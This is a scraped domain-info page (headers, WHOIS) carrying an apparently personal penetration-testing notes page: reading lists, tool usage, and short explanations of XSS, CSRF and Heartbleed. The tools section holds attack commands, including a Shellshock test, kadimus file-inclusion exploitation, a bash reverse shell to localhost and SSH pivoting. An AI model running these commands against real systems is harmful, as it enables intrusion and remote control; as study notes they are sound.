Server:Apache...
The main IP address: 185.119.173.124, Your server: -, ISP: -, TLD: uk, CountryCode: -
The description :books/resources scripts tools eli5 books/resources web application hackers handbook a great (free) linux command line / bash scripting refresher: http://linuxcommand.org/tlcl.php some windows cmd stuf...
This report was updated on 25-Jul-2019
Created Date: | 2003-12-07 |
Changed Date: | 2017-12-07 |
GeoIP provides information such as latitude, longitude and ISP (Internet Service Provider). Our GeoIP service looked up where the host janusz.co.uk is located. It is currently hosted in - and its service provider is - .
Latitude: | 0 |
Longitude: | 0 |
Country: | - (-) |
City: | - |
Region: | - |
ISP: | - |
HTTP header information is a part of the HTTP protocol that a user's browser sends to the web server (here Apache), containing the details of what the browser wants and will accept back from the web server.
X-Cache: | MISS from lin-10-170-0-222.gridhost.co.uk |
Transfer-Encoding: | chunked |
Set-Cookie: | DYNSRV=lin-10-170-0-222; path=/ |
X-Cache-Lookup: | HIT from lin-10-170-0-222.gridhost.co.uk:3128 |
Server: | Apache |
Connection: | close |
Date: | Thu, 25 Jul 2019 05:27:00 GMT |
Content-Type: | text/html; charset=UTF-8 |
soa: | ns1.vhdns.net. support.registron.co.uk. 1512075533 10800 3600 604800 3600 |
ns: | ns1.vhdns.net. ns2.vhdns.net. |
ipv4: | IP:185.119.173.124 ASN:198047 OWNER:UKWEB-EQX, GB Country:GB |
mx: | MX preference = 0, mail exchanger = mail.vhdns.net. |
Books/Resources

Web Application Hacker's Handbook
A great (free) Linux command line / bash scripting refresher: http://linuxcommand.org/tlcl.php
Some Windows cmd stuff, but I would try to find something better: https://technet.microsoft.com/en-gb/library/bb490890.aspx
RTFM - a useful command line cheat sheet for Linux and Windows, despite some errors: https://www.amazon.co.uk/rtfm-red-team-field-manual/dp/1494295504
Introduction to network/infrastructure testing, often used for initial CREST theory exam revision; there are two editions worth looking at, the 2nd and 3rd edition: https://www.amazon.co.uk/network-security-assessment-know-your/dp/0596510306
Windows & Linux privilege escalation fundamentals: http://www.fuzzysecurity.com/tutorials/16.html and https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
This one is for Windows and Linux, comes with free VMs: https://github.com/sagishahar/lpeworkshop
Good pentest book series: https://www.amazon.com/hacker-playbook-practical-penetration-testing/dp/1494932636 and https://www.amazon.com/hacker-playbook-practical-penetration-testing/dp/1512214566/
Hacking Exposed series: https://www.amazon.co.uk/s/ref=nb_sb_ss_i_2_7?url=search-alias%3dstripbooks&field-keywords=hacking+exposed&sprefix=hacking%2cstripbooks%2c162
All you would like to know about how Nmap works: https://nmap.org/book/man.html
Online hacking challenges, worth trying out, some of these are similar to OSCP (see below) quality: https://www.hackthebox.eu/ and https://www.hackthissite.org/
Some interesting subjects to explore if time allows: http://opensecuritytraining.info/training.html

Scripts

Shellshock
    x='() { :;}; echo vulnerable' bash -c :
    shocker.py -h hostname -e command_to_execute -c cgi_file_to_check - NCC Group
    nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls - Nmap
Heartbleed
    Travis Lee
    nmap -p 443 --script ssl-heartbleed - Nmap

Tools / Utilities

sqlmap
nmap
    Service discovery: nmap -T4 -A -v -p0-65535 xxx.xxx.xxx.xxx
mimikatz - Windows post-exploitation tool
    Offensive Security useful link: https://www.offensive-security.com/metasploit-unleashed/mimikatz/
curl
    curl -v xxx.xxx.xxx.xxx
kadimus - LFI scan & exploit tool
    Scanning: ./kadimus -u localhost/?pg=contact -a my_user_agent
    Get source code of file: ./kadimus -t localhost/?pg=contact -g -f "index.php%00" -o local_output.php --inject-at pg
    Execute PHP: ./kadimus -t localhost/?pg=php://input%00 -c 'pwned' -x input
    Execute command: ./kadimus -t localhost/?pg=/var/log/auth.log -x auth -c 'ls -lah' --ssh-target localhost
    Reverse shell: ./kadimus -t localhost/?pg=contact.php -xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
ssh
    Log in using key: ssh -i key_name [email protected]
    Forward connections to TCP port 8888 on our client to TCP port 80 on internal.site.com: ssh -L 8888:internal.site.com:80 -N user_login
    Pivoting: ssh -D 9090 user_login then use proxychains, then edit /etc/proxychains.conf and add socks4 127.0.0.1 9090
    TODO: use netwars ssh
TODO: empire

ELI5

XSS: when the user trusts the server too much. The attacker tries to force/trick you into making a request which you did not intend. https://janusz.co.uk/account?variable=a'<script>alert(1)</script>
CSRF: when the server trusts the user too much. https://janusz.co.uk/changepassword?userid=1&newpassword=foobar
Heartbleed: OpenSSL does not check to see whether the sender lied about the length of the enclosed message. If it sends a ridiculously large number — something much larger than the full heartbeat message itself — the receiver will keep reading its memory right past the location where the message is stored, and into the program's own memory (xkcd).
http://www.janusz.co.uk//#tools
http://www.janusz.co.uk//#books
http://www.janusz.co.uk//#eli5
http://www.janusz.co.uk//#scripts
http://www.janusz.co.uk//mimikatz
amazon.co.uk
Whois is a protocol that provides access to registration information. You can find out when the website was registered, when it will expire, and the contact details for the site. In a nutshell, it includes the following information:
Domain name:
janusz.co.uk
Registrant:
Janusz Jasinski
Registrant type:
UK Individual
Registrant's address:
The registrant is a non-trading individual who has opted to have their
address omitted from the WHOIS service.
Data validation:
Nominet was able to match the registrant's name and address against a 3rd party data source on 22-Jan-2018
Registrar:
Paragon Internet Group Ltd t/a Tsohost [Tag = UKWEBHOSTING]
URL: http://www.tsohost.co.uk
Relevant dates:
Registered on: 07-Dec-2003
Expiry date: 07-Dec-2018
Last updated: 07-Dec-2017
Registration status:
Registered until expiry date.
Name servers:
ns1.tsodns.com
ns2.tsodns.com
WHOIS lookup made at 05:26:45 05-Feb-2018
--
This WHOIS information is provided for free by Nominet UK the central registry
for .uk domain names. This information and the .uk WHOIS are:
Copyright Nominet UK 1996 - 2018.
You may not access the .uk WHOIS or use any data from it except as permitted
by the terms of use available in full at http://www.nominet.uk/whoisterms,
which includes restrictions on: (A) use of the data for advertising, or its
repackaging, recompilation, redistribution or reuse (B) obscuring, removing
or hiding any or all of this notice and (C) exceeding query rate or volume
limits. The data is provided on an 'as-is' basis and may lag behind the
register. Access may be withdrawn or restricted at any time.
REFERRER http://www.nominet.org.uk
REGISTRAR Nominet UK
SERVERS
SERVER co.uk.whois-servers.net
ARGS janusz.co.uk
PORT 43
TYPE domain
OWNER
ORGANIZATION Janusz Jasinski
TYPE
UK Individual
ADDRESS
The registrant is a non-trading individual who has opted to have their
address omitted from the WHOIS service.
Data validation:
Nominet was able to match the registrant's name and address against a 3rd party data source on 22-Jan-2018
DOMAIN
SPONSOR Paragon Internet Group Ltd t/a Tsohost [Tag = UKWEBHOSTING]
CREATED 2003-12-07
CHANGED 2017-12-07
STATUS
Registered until expiry date.
NSERVER
NS1.TSODNS.COM 188.65.116.165
NS2.TSODNS.COM 195.62.28.26
NAME janusz.co.uk
REGISTERED yes
The following list shows possible spelling mistakes that internet users might make for the website searched.